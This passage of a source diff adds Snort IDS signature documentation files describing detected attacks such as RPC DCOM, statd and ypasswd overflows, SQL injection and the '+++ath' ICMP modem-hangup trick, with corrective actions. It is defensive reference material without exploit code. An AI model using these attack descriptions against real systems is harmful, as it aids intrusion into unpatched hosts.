+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2802.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2802
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure check_ddl_text
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1951.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1951
+
+--
+Summary:
+This event is generated when an attempt is made to mount a specific file system exported through Network File System (NFS). 
+
+--
+Impact:
+Remote access.  This mount request can give an attacker remote access to an NFS directory.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a mount of a specific file system.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt a mount of an NFS directory to read or change files.
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to mount NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3383.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3383
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/274.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+274
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of Service attack that works against some modems.
+
+--
+Impact:
+The system may be disconnected from it's dial-up connection.
+
+--
+Detailed Information:
+An ICMP Echo Request is sent to a target system with a payload that
+includes "+++ath".  The "+++" is an attention sequence that allows a
+user to enter commands to the modem.  "ath" is the modem hangup command.
+An ICMP Echo Reply includes the same payload as the associated request.
+On some modems, when the machine tries to reply to this packet, "+++ath"
+will be interpreted as a command and the modem will hangup.  The remote
+address can be spoofed.
+
+--
+Affected Systems:
+unknown
+
+--
+Attack Scenarios:
+A user can remotely cause a modem to disconnect.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Set a guard time on the modem. Contact the modem manufacturer for
+details. A guard time will cause the modem to wait after receiving
+"+++". Any further input during this wait, including "ath", will be 
+disregarded. 
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS264
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCAN-1999-1228
+
+Security Focus:
+http://www.securityfocus.com/archive/1/10706
+
+--
--- /dev/null
+++ b/doc/signatures/1047.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1047
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/458.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+458
+
+--
+
+Summary:
+This event is generated when an ICMP Type 1 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 1 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 1 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 1 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/1211.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1211
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3007.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+3007
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the DELETE command of the IPSwitch IMail IMAP service.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that the IPSwitch IMail IMAP service
+handles a DELETE command.  An excessively long user-supplied mailbox name
+to be deleted can trigger a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	IPSwitch IMail IMAP4 server 8.13
+
+--
+Attack Scenarios:
+An attacker can supply an overly long mailbox name for deletion, possibly causing
+denial of service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000144.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000144
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/2028.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2028
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
--- /dev/null
+++ b/doc/signatures/100000106.txt
@@ -0,0 +1,90 @@
+Rule: 
+
+--
+Sid: 
+100000106
+
+-- 
+Summary: 
+This event is generated when an SQL injection attempt is made against the 
+Microsoft BizTalk Server DTA Interface.
+
+-- 
+
+Impact: 
+Attackers may retreive or modify sensitive in formation stored in the affected 
+database. Additionally, attackers may use the database's functionality to 
+execute arbitrary commands on the system with the priviliges of the user 
+running the script, typically Administrator.
+
+--
+Detailed Information:
+This rule looks specifically for attacks against the rawdocdata.asp module of 
+the DTA Interface which contain the string "exec", which is required to run 
+commands on the host system. Thus, this rule does not detect generic SQL 
+injection attempts, only command execution attempts.
+
+--
+Affected Systems:
+Microsoft BizTalk Server 2000 Developer Edition SP2
+Microsoft BizTalk Server 2000 Developer Edition SP1a
+Microsoft BizTalk Server 2000 Developer Edition
+Microsoft BizTalk Server 2000 Enterprise Edition SP2
+Microsoft BizTalk Server 2000 Enterprise Edition SP1a
+Microsoft BizTalk Server 2000 Enterprise Edition
+Microsoft BizTalk Server 2000 Standard Edition SP2
+Microsoft BizTalk Server 2000 Standard Edition SP1a
+Microsoft BizTalk Server 2000 Standard Edition
+Microsoft BizTalk Server 2002 Developer Edition
+Microsoft BizTalk Server 2002 Enterprise Edition
+
+--
+
+Attack Scenarios: 
+A web browser or a script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as example attacks that can be used with a web browser are publicly 
+available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Patches which correct this problem are available from Microsoft.com.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+Microsoft BizTalk Server 2000 Enterprise Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+Microsoft BizTalk Server 2000 Developer Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+Microsoft BizTalk Server 2000 Standard Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+
+Microsoft BizTalk Server 2002 Enterprise Edition: 
+http://microsoft.com/downloads/details.aspx?FamilyId=A05344FE-2622-4887-AA45-3DE
+7C4ED3C75&displaylang=en
+
+Microsoft BizTalk Server 2002 Developer Edition: 
+http://microsoft.com/downloads/details.aspx?FamilyId=A05344FE-2622-4887-AA45-3DE
+7C4ED3C75&displaylang=en
+
+-- 
--- /dev/null
+++ b/doc/signatures/1890.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1891
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an
+unvalidated format string error associated the with Remote Procedure
+Call (RPC) statd.
+
+--
+Impact:
+Remote root access. If successful, this exploit allows execution of
+arbitrary commands as root.
+
+--
+Detailed Information:
+The statd RPC services implements a component of the Network File System
+(NFS) known as the Network Status and Monitor protocol.  A vulnerability
+exists due to improper format string checking that allows arbitrary code
+to be executed with the privileges of statd, usually root.
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	RedHat Linux 6.0, 6.1, 6.2
+	RedHat nfs-utils-0.1.6-2.i386.rpm + RedHat Linux 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where statd
+runs and send the exploit to the statd port. If the portmapper port is
+blocked, the attacker may send the exploit to any listening port in the
+range associated with RPC services.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3195.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3195
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft WINS.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft WINS such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker would need to send multiple malformed request to the WINS
+service running on a host.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uninstall the WINS service.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/872.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+872
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2515.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2515
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000828.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000828
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "cond" parameter in the "address.view.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2406.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2406
+
+--
+Summary:
+This event is generated when an attempt is made to access an APC device
+using a known default administrative account and password via Telnet.
+
+--
+Impact:
+Serious. Unauthorized administrative access to the device.
+
+--
+Detailed Information:
+The APC Management card uses a known default administrative name and
+password. This rule generates an event when these credentials are used
+in a Telnet session. If this account and password have not been changed
+this can lead to unauthorized administrative access to the device.
+
+--
+Affected Systems:
+	APC WEB/SNMP Management Card (9606) Firmware 3.0 and 3.0.1
+
+--
+Attack Scenarios:
+An attacker may try to use this password and username combination to
+gain access to an affected device.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Change the administrative account username and password.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2132.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 2132
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in Synchrologic Email Accelerator running on Microsoft IIS. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a weakness in the Synchrologic Email Accelerator application.
+
+The attacker may be trying to gain information on the list of users allowed to use the service, this may be the prelude to an attack against the host using that information.
+
+--
+Affected Systems:
+Any host using Synchrologic Email Accelerator.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the list of authorized users for the application. The attacker might then gain access to the application as a valid user.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/543.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+543
+
+--
+Summary:
+This event is generated when an attempt is made to store a file named
+"1mb" on an ftp server.
+
+--
+Impact:
+Possible abuse ftp behavior by hordes of warez sites, and the
+existance of (potentially) illegal files/software on an ftp server.
+
+--
+Detailed Information:
+Warez sites have been known to name "warez" files by their size.  Large
+files are split into smaller, more manageable chunks, and allow warez
+sites to store large files on ftp sites in a semi-organized manner.
+
+--
+Affected Systems:
+ All FTP servers
+
+--
+Attack Scenarios:
+As part of an attempt to store elite warez on an ftp server, an
+attacker named the file "1mb" to indicate it's size.  This file is
+likely part of an archive that represents a larger, most likely
+illegal copy of media.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required
+
+--
+False Positives:
+If a legitimate user has a legitimate file named "1mb", this rule may
+generate an event.
+
+--
+False Negatives:
+This will detect only files named 1mb.  If a warez site decides to
+start naming their files in a different way this rule will not generate
+an event.
+
+--
+Corrective Action:
+Inspect the ftp server for a file named 1mb. If it exists, determine
+if the file is legitimate, or if it was deposited by someone attempting
+to use the server to distribute non-legitimate files.
+
+Furthermore, evaluate the need for ftp write access.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3039.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3039
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1130.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1130
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1807.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1807
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
